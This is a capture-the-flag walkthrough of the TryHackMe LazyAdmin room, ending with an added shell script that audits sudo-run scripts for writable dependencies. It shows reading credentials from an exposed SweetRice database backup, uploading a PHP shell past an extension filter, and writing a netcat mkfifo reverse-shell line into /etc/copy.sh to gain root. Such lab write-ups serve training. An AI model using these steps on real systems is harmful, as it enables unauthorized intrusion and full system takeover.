LazyAdmin (TryHackMe)
Perform an Nmap scan to find open ports and services; you can use the following command:
nmap -sV <target>
Once port 80 was found to be open, we used the dirsearch tool to scan for directories and files.
python3 dirsearch.py -u <target> -x 400,401,403
Then we opened the path /content in the web browser.
Having discovered the SweetRice CMS, we searched for an exploit to take the next step.
Go to http://IP_target/content/inc/mysql_backup
Download: mysql_bakup_20191129023059-1.5.1.sql (2019-11-29 12:30, 4.7K)
Inspect the contents of mysql_bakup_20191129023059-1.5.1.sql from the command line.
cd Downloads
cat mysql_bakup_20191129023059-1.5.1.sql
The password in the dump is an MD5 hash; after decoding it we finally have the credentials: manager : Password123
The interesting one is "SweetRice 1.5.1 - Arbitrary File Upload".
The exploit's source code indicates that the login page is at /as.
Go to that path and log in.
Go to the Media Center to upload.
The allowed file extensions for upload are…
Then upload the malicious PHP file.
Open a listener on port 1234.
Upload the file
After intercepting the HTTP request with Burp Suite, change the extension of the uploaded file to .php5, then click "Forward".
Finally, we got a shell.
Next, we'll move on to privilege escalation.
Run sudo -l.
We locate backup.pl, which runs /etc/copy.sh, and modify that script.
We will replace the sh file it executes:
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Replace the IP with my own:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f
Write the new reverse shell line to the file:
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f" > /etc/copy.sh
Open a netcat listener and wait.
In the reverse shell, run: sudo perl /home/itguy/backup.pl
Go back to the waiting netcat listener, and finally we got root.
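A defensive counterpart to this escalation, added here as an example (it is not part of the room or the original writeup): a small POSIX sh audit that takes a script a sudoers rule allows to run as root, such as backup.pl, and flags any file it references that other users can write to. The paths in its usage comment are the ones from this room; the script filename is an assumption.

```shell
#!/bin/sh
# Added defensive check, not part of the original writeup.
# audit_sudo_script <script>
#   Given a script that a sudoers rule lets a user run as root (in this room,
#   /home/itguy/backup.pl), print "WRITABLE <path> <mode>" for every absolute
#   path the script mentions that exists and is group- or world-writable.
#   Exit status is 1 if anything was flagged, 0 otherwise.
#   The LazyAdmin root shell exists because backup.pl runs /etc/copy.sh and
#   copy.sh is writable by the low-privilege user; this check would have
#   caught that before anyone edited copy.sh.
audit_sudo_script() {
    script="$1"
    status=0
    # Pull absolute paths out of the script text, e.g. /etc/copy.sh.
    for dep in $(grep -oE '/[A-Za-z0-9_./-]+' "$script" | sort -u); do
        [ -f "$dep" ] || continue
        # ls -ld mode string, e.g. -rwxrwxrwx; column 6 is the group-write
        # bit and column 9 the other-write bit.
        mode=$(ls -ld "$dep" | cut -c1-10)
        gw=$(printf '%s' "$mode" | cut -c6)
        ow=$(printf '%s' "$mode" | cut -c9)
        if [ "$gw" = "w" ] || [ "$ow" = "w" ]; then
            echo "WRITABLE $dep $mode"
            status=1
        fi
    done
    return $status
}

# Usage (assumed filename): ./audit_sudo_script.sh /home/itguy/backup.pl
# Run it for every script listed by `sudo -l`. Without an argument nothing
# runs, so the function can also be sourced by other checks.
if [ $# -gt 0 ]; then
    audit_sudo_script "$1"
fi
```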